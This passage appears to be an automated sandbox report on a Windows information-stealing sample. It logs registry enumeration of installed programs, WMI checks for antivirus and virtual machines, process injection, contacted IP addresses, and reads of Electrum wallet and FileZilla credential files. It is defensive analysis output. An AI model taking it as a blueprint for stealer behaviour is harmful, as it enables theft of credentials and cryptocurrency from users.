RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: ENTERPRISE base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: Fontcore base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: Google Chrome base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: IE40 base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: IE4Data base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: IE5BAKEX base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: IEData base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: MobileOptionPack base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: SchedulingAgent base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: WIC base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1	0
RegOpenKeyExA March 22, 2021, 5:35 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\CCleaner_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000101 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\CCleaner_is1		2
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000878 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: 7-Zip base_handle: 0x00000878 key_handle: 0x0000087c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: AddressBook base_handle: 0x00000878 key_handle: 0x0000087c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: Connection Manager base_handle: 0x00000878 key_handle: 0x0000087c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: DirectDrawEx base_handle: 0x00000878 key_handle: 0x0000087c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: EditPlus base_handle: 0x00000878 key_handle: 0x0000087c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: ENTERPRISE base_handle: 0x00000878 key_handle: 0x0000087c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: Fontcore base_handle: 0x00000878 key_handle: 0x0000087c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (3 events)

host	172.217.25.14
host	185.153.198.36
host	74.119.193.164

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 155648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002b4	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation March 22, 2021, 5:35 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Deletes executed files from disk (1 event)

file	C:\ProgramData\uacwev.bat

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProuct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory March 22, 2021, 5:35 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELhzãà0ìè @ `@HèO Ô@,è H.texthè ì `.rsrcÔ ð@@.reloc@ø@B base_address: 0x00400000 process_identifier: 8620 process_handle: 0x000002b4	1	1
WriteProcessMemory March 22, 2021, 5:35 p.m.	buffer: P8hÔ DD4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¤StringFileInfo000004b0,FileDescription 0FileVersion0.0.0.06InternalNameFinale.exe(LegalCopyright >OriginalFilenameFinale.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0ä"êï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00422000 process_identifier: 8620 process_handle: 0x000002b4	1	1
WriteProcessMemory March 22, 2021, 5:35 p.m.	buffer: à8 base_address: 0x00424000 process_identifier: 8620 process_handle: 0x000002b4	1	1
WriteProcessMemory March 22, 2021, 5:35 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 8620 process_handle: 0x000002b4	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory March 22, 2021, 5:35 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELhzãà0ìè @ `@HèO Ô@,è H.texthè ì `.rsrcÔ ð@@.reloc@ø@B base_address: 0x00400000 process_identifier: 8620 process_handle: 0x000002b4	1	1	0

Collects information about installed applications (50 out of 58 events)

Time & API	Arguments	Status
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x000006f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW March 22, 2021, 5:35 p.m.	key_handle: 0x0000087c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
